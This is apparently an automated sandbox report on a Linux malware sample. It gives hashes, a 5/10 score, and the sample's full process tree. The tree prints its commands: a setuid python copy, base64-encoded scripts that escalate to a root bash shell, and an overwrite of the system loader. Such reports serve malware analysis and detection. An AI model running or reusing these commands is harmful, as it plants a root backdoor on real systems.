Resubmissions

14-07-2022 15:45

220714-s61q8ahdam 10

08-07-2022 08:10

220708-j2selsgfep 5

07-07-2022 21:44

220707-1lxg3afba8 5

Analysis

  • max time kernel
    0s
  • max time network
    102s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • submitted
    14-07-2022 15:45

General

  • Target

    f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8

  • Size

    870KB

  • MD5

    67048a69a007c37f8be5d01a95f6a026

  • SHA1

    8e47e49602747f3be4d469a0c573f0362b353b61

  • SHA256

    f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8

  • SHA512

    21e6e6b330b74528b2b8c050d6b4ca98d87d4a25660f73d6978f688fdf45c9a2da457292af852eae8f8d276ddf297f2d88b00b6f7c8bba0cd05c9272eb64d21b

Score
5/10

Malware Config

Signatures

  • Reads runtime system information 8 IoCs

    Reads data from the /proc virtual filesystem.

Processes

  • ./f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8
    ./f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8
    1⤵
    • Reads runtime system information
    PID:571
    • /bin/sh
      sh -c "mkdir /lib/libntpVnQE6mk"
      2⤵
        PID:572
        • /bin/mkdir
          mkdir /lib/libntpVnQE6mk
          3⤵
          • Reads runtime system information
          PID:573
      • /bin/sh
        sh -c "cp /lib/x86_64-linux-gnu/ld-2.27.so /lib/libntpVnQE6mk/.backup_ld.so"
        2⤵
          PID:574
          • /bin/cp
            cp /lib/x86_64-linux-gnu/ld-2.27.so /lib/libntpVnQE6mk/.backup_ld.so
            3⤵
            • Reads runtime system information
            PID:575
        • /bin/sh
          sh -c "ls -l /lib64/ld-linux-x86-64.so.2"
          2⤵
            PID:576
            • /bin/ls
              ls -l /lib64/ld-linux-x86-64.so.2
              3⤵
              • Reads runtime system information
              PID:577
          • /bin/sh
            sh -c "chown -R 920366:920366 /lib/libntpVnQE6mk/"
            2⤵
              PID:578
              • /bin/chown
                chown -R 920366:920366 /lib/libntpVnQE6mk/
                3⤵
                  PID:579
              • /bin/sh
                sh -c "mkdir /lib/libntpVnQE6mk/bin; cp /usr/bin/python /lib/libntpVnQE6mk/bin/python; chmod 4755 /lib/libntpVnQE6mk/bin/python"
                2⤵
                  PID:580
                  • /bin/mkdir
                    mkdir /lib/libntpVnQE6mk/bin
                    3⤵
                    • Reads runtime system information
                    PID:581
                  • /bin/cp
                    cp /usr/bin/python /lib/libntpVnQE6mk/bin/python
                    3⤵
                    • Reads runtime system information
                    PID:582
                  • /bin/chmod
                    chmod 4755 /lib/libntpVnQE6mk/bin/python
                    3⤵
                      PID:583
                  • /bin/sh
                    sh -c "echo aW1wb3J0IG9zCm9zLnNldHJldWlkKDAsMCkKb3MuZXhlY3YoIi9iaW4vYmFzaCIsICgiL2Jpbi9iYXNoIiwgIi1pIikpCg==|base64 -di > /lib/libntpVnQE6mk/bin/escalator"
                    2⤵
                      PID:584
                      • /usr/bin/base64
                        base64 -di
                        3⤵
                          PID:586
                      • /bin/sh
                        sh -c "echo IyEvYmluL2Jhc2gKaWYgWyAiJChpZCAtdSkiIC1uZSAwIF0gOyB0aGVuCiAgIGVjaG8gIldlbGNvbWUgdG8gJChob3N0bmFtZSkuIFlvdSBhcmUgR0lEICQoaWQgLWcpLCBVSUQgJChpZCAtdSkgYW5kIGFib3V0IHRvIGJlIGVzY2FsYXRlZCB0byBVSUQgMC4iCiAgIGV4ZWMgfi9iaW4vcHl0aG9uIH4vYmluL2VzY2FsYXRvcgpmaQpQUzE9J1tcdUBcaCBcV11cJCAnCg==|base64 -di > /lib/libntpVnQE6mk/.profile; chown 920366:920366 /lib/libntpVnQE6mk/.profile; chmod +x /lib/libntpVnQE6mk/.profile;ln -s /lib/libntpVnQE6mk/.profile /lib/libntpVnQE6mk/.bashrc"
                        2⤵
                          PID:587
                          • /usr/bin/base64
                            base64 -di
                            3⤵
                              PID:589
                            • /bin/chown
                              chown 920366:920366 /lib/libntpVnQE6mk/.profile
                              3⤵
                                PID:590
                              • /bin/chmod
                                chmod +x /lib/libntpVnQE6mk/.profile
                                3⤵
                                  PID:591
                                • /bin/ln
                                  ln -s /lib/libntpVnQE6mk/.profile /lib/libntpVnQE6mk/.bashrc
                                  3⤵
                                    PID:592
                                • /bin/sh
                                  sh -c "cp -p /lib/x86_64-linux-gnu/ld-2.27.so /lib/lib0UZ0LfvWZ.so"
                                  2⤵
                                    PID:593
                                    • /bin/cp
                                      cp -p /lib/x86_64-linux-gnu/ld-2.27.so /lib/lib0UZ0LfvWZ.so
                                      3⤵
                                      • Reads runtime system information
                                      PID:594
                                  • /bin/sh
                                    sh -c "mv /lib/lib0UZ0LfvWZ.so /lib/x86_64-linux-gnu/ld-2.27.so"
                                    2⤵
                                      PID:595
                                      • /bin/mv
                                        mv /lib/lib0UZ0LfvWZ.so /lib/x86_64-linux-gnu/ld-2.27.so
                                        3⤵
                                        • Reads runtime system information
                                        PID:596

                                  Network

                                  MITRE ATT&CK Matrix
